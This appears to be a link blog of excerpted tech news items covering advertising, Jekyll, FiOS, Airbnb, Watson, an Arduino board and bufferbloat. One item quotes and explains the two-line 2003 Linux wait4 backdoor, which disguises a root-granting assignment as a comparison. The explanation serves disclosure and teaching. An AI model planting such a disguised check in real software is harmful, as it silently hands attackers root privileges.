Targeted Advertising Considered Harmful

What happens, though, if sellers try to reduce the load that advertising carries, by “efficiently” targeting some users and not others? As a member of the audience, the more likely it is that the ad you’re seeing is custom-targeted to you, the less information the advertiser is able to convey. With good enough targeting, you could be the one poor loser who they’re trying to stick with the last obsolete unit in the warehouse.

via Targeted Advertising Considered Harmful.

Today, though, we have different norms and technologies around security. A .EXE in email will get quarantined, filtered, or buried under layers of warnings.

The same thing is happening with privacy problems. Browser developers are steadily closing the bugs that make creepy tracking possible. And yes, that makes some advertising techniques obsolete, the same way that corporate virus checkers killed off the animated .EXE Christmas card business.

But if you want to send customers a holiday greeting, you still can. And after the web fixes its privacy bugs, you’ll still be able to advertise. It will just work better.

Jekyll

Jekyll is a simple, blog-aware, static site generator. It takes a template directory containing raw text files in various formats, runs it through Markdown (or Textile) and Liquid converters, and spits out a complete, ready-to-publish static website suitable for serving with your favorite web server. Jekyll also happens to be the engine behind GitHub Pages, which means you can use Jekyll to host your project’s page, blog, or website from GitHub’s servers for free.

via Welcome.

Scientists who took chemistry into cyberspace win Nobel Prize

Chemical reactions occur at lightning speed as electrons jump between atomic nuclei, making it virtually impossible to map every separate step in chemical processes involving large molecules like proteins.

Powerful computer models, first developed by the three scientists in 1970s, offer a new window onto such reactions and have become a mainstay for researchers in thousands of academic and industrial laboratories around the world.

via Scientists who took chemistry into cyberspace win Nobel Prize – chicagotribune.com.

The Linux Backdoor Attempt of 2003

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current -> uid == 0.  Sneaky!

The great Verizon FiOS ripoff

After decades of demanding and getting rate hikes and tax breaks in return for promising to deliver broadband internet access to schools, libraries, hospitals and every home and business in their territories, Verizon is now making it clear that it is no longer expanding FiOS, its fiber optic cable service.

via The great Verizon FiOS ripoff.

America is 15th or 33rd in the world in broadband, depending on which international or research group you believe. The failure to properly upgrade the PSTN, and the con of FiOS expenditures, has cost a large swath of America — from Massachusetts through Virginia and the old GTE territories, such as parts of California — a generation of technology, innovation and GDP growth.

New York Just Subpoenaed Airbnb to Hand Over Its User Data

The city is fighting the startup for breaking local laws against operating an illegal hotel out of your home, worried that hustlers are abusing the online service to turn a profit. To that end, New York Attorney General Eric Schneiderman just slapped the company with a subpoena to hand over the user data of all New Yorkers who’ve listed their apartment on the site, the New York Daily News reported today. That’s about 225,000 users.

via New York Just Subpoenaed Airbnb to Hand Over Its User Data | Motherboard.

What If IBM’s Watson Dethroned the King of Search?

Google continues to top the search game with the mission of “organiz[ing] the world’s information and mak[ing] it universally accessible and useful.” But now this mission is limited given how rapidly artificial intelligence has pushed the boundaries of what’s possible. It’s raised expectations of what we expect from computers. Even Siri has. In that mindset, Google is basically a gigantic database with rich access and retrieval mechanisms without the ability to create new knowledge.

via Google in Jeopardy: What If IBM’s Watson Dethroned the King of Search? | Wired Opinion | Wired.com.

In other words: Google can retrieve, but Watson can create.

Google wants a patent on splitting the restaurant bill

Google Patent Application, October 2013: “For example, continuing with the example of FIG. 4, assume that Users A-C have drinks at a bar and User B pays a bill of $45 for the drinks. User B adds the payment transaction as an expenditure of the group and allocates $15 of the transaction to User A, $20 to User B, $10 to User C. In this example, the balance module 308 would update the individual balances of Users A-C to indicate that User B now owes $115 to User A ($130-$15) and User C owes $10 to User B ($0+$10).”

via No joke: Google wants a patent on splitting the restaurant bill – GeekWire.

I didn’t think one could patent a mathematical formula.

Linux-capable Arduino TRE debuts at Maker Faire Rome

As Zoe Romano puts it in an Arduino blog post, “the Arduino TRE is two Arduinos in one.” Basically, the new ARM Cortex-A8-based Sitara AM335x’s job is to run Linux applications and manage the SBC’s PC-style interfaces (video, audio, Ethernet, USB, optional WiFi, etc.), while an Atmel ATmega microcontroller takes care of the SBC’s real-world I/O (analog inputs, digital I/O, PWM outputs, etc) and handles the interface to shields (Arduino expansion modules) in a fully AVR-compatible manner. Best of all, Romano points out, the 1GHz TI ARM processor offers up to “100 times more performance” than Arduino’s earlier Leonardo and Uno boards, writes Romano.

via Linux-capable Arduino TRE debuts at Maker Faire Rome ·  LinuxGizmos.com.

What’s unique about the TRE, however, is that its Linux OS runs on an ARM processor that’s truly integrated into the SBC’s basic architecture, as opposed to being a collateral benefit of a WiFi add-on module. As a result, the TRE will support a “full Linux” OS in contrast to the Yun’s Linino OS, a custom version of the lightweight OpenWRT embedded Linux distribution.

Cerowrt

CeroWrt is a project built on the OpenWrt firmware to resolve the endemic problems of bufferbloat in home networking today, and to push forward the state of the art of edge networks and routers. Projects include proper IPv6 support, tighter integration with DNSSEC, and most importantly, reducing bufferbloat in both the wired and wireless components of the stack.

via Cerowrt – Overview – Bufferbloat.

From their wiki page on buffer bloat:

Bufferbloat is a huge drag on Internet performance created, ironically, by previous attempts to make it work better. The one-sentence summary is “Bloated buffers lead to network-crippling latency spikes.”

The bad news is that bufferbloat is everywhere, in more devices and programs than you can shake a stick at. The good news is, bufferbloat is relatively easy to fix. The even better news is that fixing it may solve a lot of the service problems now addressed by bandwidth caps and metering, making the Internet faster and less expensive for both consumers and providers.